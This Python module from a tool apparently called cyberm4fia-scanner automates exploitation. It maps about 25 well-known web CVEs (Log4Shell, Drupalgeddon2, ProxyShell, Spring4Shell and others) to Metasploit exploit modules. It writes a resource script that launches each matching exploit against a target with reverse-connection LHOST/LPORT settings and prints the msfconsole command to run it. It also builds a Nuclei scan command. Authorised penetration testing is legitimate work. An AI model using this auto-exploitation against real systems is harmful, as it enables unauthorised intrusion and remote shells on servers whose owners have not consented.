"""
cyberm4fia-scanner - Auto-Pwn Bridge
Generates Metasploit resource scripts and Nuclei commands for confirmed
vulnerabilities.
"""

import os
import shutil

from utils.colors import log_info, log_success, log_warning


# ─── CVE → Metasploit Module Mapping (curated top web CVEs) ─────────────────

CVE_MSF_MAP = {
    # Apache / Tomcat
    "CVE-2021-41773": "exploit/multi/http/apache_normalize_path_rce",
    "CVE-2021-42013": "exploit/multi/http/apache_normalize_path_rce",
    "CVE-2017-5638":  "exploit/multi/http/struts2_content_type_ognl",
    "CVE-2017-12617": "exploit/multi/http/tomcat_jsp_upload_bypass",
    "CVE-2019-0232":  "exploit/windows/http/tomcat_cgi_cmdlineargs",
    # Log4j
    "CVE-2021-44228": "exploit/multi/http/log4shell_header_injection",
    # WordPress
    "CVE-2020-25213": "exploit/unix/webapp/wp_file_manager_rce",
    "CVE-2019-8942":  "exploit/unix/webapp/wp_crop_rce",
    # PHPUnit / PHP
    "CVE-2017-9841":  "exploit/multi/http/phpunit_eval_stdin",
    "CVE-2012-1823":  "exploit/multi/http/php_cgi_arg_injection",
    # Drupal
    "CVE-2018-7600":  "exploit/unix/webapp/drupal_drupalgeddon2",
    "CVE-2019-6340":  "exploit/unix/webapp/drupal_restws_unserialize",
    # Spring
    "CVE-2022-22963": "exploit/multi/http/spring_cloud_function_spel_injection",
    "CVE-2022-22965": "exploit/multi/http/spring4shell",
    # Confluence
    "CVE-2021-26084": "exploit/multi/http/confluence_ognl_injection",
    "CVE-2022-26134": "exploit/multi/http/confluence_ognl_injection",
    # Exchange / ProxyShell
    "CVE-2021-34473": "exploit/windows/http/exchange_proxyshell_rce",
    # GitLab
    "CVE-2021-22205": "exploit/multi/http/gitlab_exif_rce",
    # Jenkins
    "CVE-2019-1003000": "exploit/multi/http/jenkins_script_console",
    # Joomla
    "CVE-2015-8562":  "exploit/multi/http/joomla_http_header_rce",
    # Laravel
    "CVE-2021-3129":  "exploit/unix/http/laravel_debug_rce",
    # F5 BIG-IP
    "CVE-2020-5902":  "exploit/linux/http/f5_bigip_tmui_rce",
    "CVE-2022-1388":  "exploit/linux/http/f5_bigip_icontrol_rce",
    # VMware
    "CVE-2022-22954": "exploit/linux/http/vmware_workspace_one_access_cve_2022_22954",
    # Grafana
    "CVE-2021-43798": "auxiliary/scanner/http/grafana_plugin_file_read",
}

# ─── Technology → Nuclei Tag Mapping ────────────────────────────────────────

TECH_NUCLEI_TAGS = {
    "wordpress": "wordpress",
    "wp":        "wordpress",
    "joomla":    "joomla",
    "drupal":    "drupal",
    "apache":    "apache",
    "nginx":     "nginx",
    "tomcat":    "tomcat",
    "iis":       "iis",
    "php":       "php",
    "laravel":   "laravel",
    "spring":    "spring",
    "django":    "django",
    "flask":     "flask",
    "express":   "express",
    "jenkins":   "jenkins",
    "gitlab":    "gitlab",
    "grafana":   "grafana",
    "confluence": "confluence",
    "jira":      "jira",
}


def generate_msf_resource(vulns, target, lhost=None, lport=4444, output_dir=None):
    """
    Generate a Metasploit resource (.rc) script for confirmed CVEs.
    Returns the path to the generated file.
    """
    if lhost is None:
        from utils.revshell import get_local_ip
        lhost = get_local_ip()

    lines = [
        "# Auto-generated by cyberm4fia-scanner",
        f"# Target: {target}",
        "",
    ]

    matched = 0
    seen_modules = set()

    for vuln in vulns:
        cve_ids = _extract_cves(vuln)
        for cve in cve_ids:
            msf_module = CVE_MSF_MAP.get(cve)
            if msf_module and msf_module not in seen_modules:
                seen_modules.add(msf_module)
                lines.extend([
                    f"# {cve} — {vuln.get('type', 'Unknown')}",
                    f"use {msf_module}",
                    f"set RHOSTS {target}",
                    f"set LHOST {lhost}",
                    f"set LPORT {lport}",
                    "set TARGETURI /",
                    "run -j",
                    "",
                ])
                matched += 1

    if matched == 0:
        log_info("No CVE → MSF module matches found.")
        return None

    content = "\n".join(lines)

    out_dir = output_dir or "/tmp"
    filepath = os.path.join(out_dir, "autopwn.rc")
    with open(filepath, "w", encoding="utf-8") as fh:
        fh.write(content)

    log_success(f"MSF resource script generated → {filepath} ({matched} exploits)")
    log_info(f"Run with: msfconsole -r {filepath}")
    return filepath


def generate_nuclei_command(target, tech_results=None, vulns=None):
    """
    Generate a ready-to-run Nuclei command string tailored to the target.
    """
    if not shutil.which("nuclei"):
        log_warning("nuclei is not installed or not in PATH.")

    parts = ["nuclei", "-u", target, "-severity", "critical,high"]

    # Add technology-specific tags
    tags = set()
    if tech_results:
        techs = tech_results if isinstance(tech_results, list) else [tech_results]
        for tech in techs:
            name = ""
            if isinstance(tech, dict):
                name = tech.get("name", "").lower()
            elif isinstance(tech, str):
                name = tech.lower()
            for keyword, tag in TECH_NUCLEI_TAGS.items():
                if keyword in name:
                    tags.add(tag)

    # Add CVE-specific tags from vulns
    if vulns:
        for vuln in vulns:
            cves = _extract_cves(vuln)
            for cve in cves:
                tags.add(cve.lower())

    if tags:
        parts.extend(["-tags", ",".join(sorted(tags))])

    parts.extend(["-o", "nuclei_results.json", "-json"])

    command = " ".join(parts)
    log_success(f"Nuclei command: {command}")
    return command


def _extract_cves(vuln):
    """Extract CVE identifiers from a vulnerability dict."""
    cves = []
    # Check direct CVE field
    cve_field = vuln.get("cve") or vuln.get("cve_id") or vuln.get("CVE")
    if cve_field:
        if isinstance(cve_field, list):
            cves.extend(cve_field)
        else:
            cves.append(str(cve_field))

    # Check inside references or details
    for field in ("references", "details", "description", "ai_analysis"):
        val = vuln.get(field, "")
        if isinstance(val, str):
            import re
            cves.extend(re.findall(r"CVE-\d{4}-\d{4,7}", val))
        elif isinstance(val, list):
            for item in val:
                if isinstance(item, str):
                    import re
                    cves.extend(re.findall(r"CVE-\d{4}-\d{4,7}", item))

    return list(set(cves))
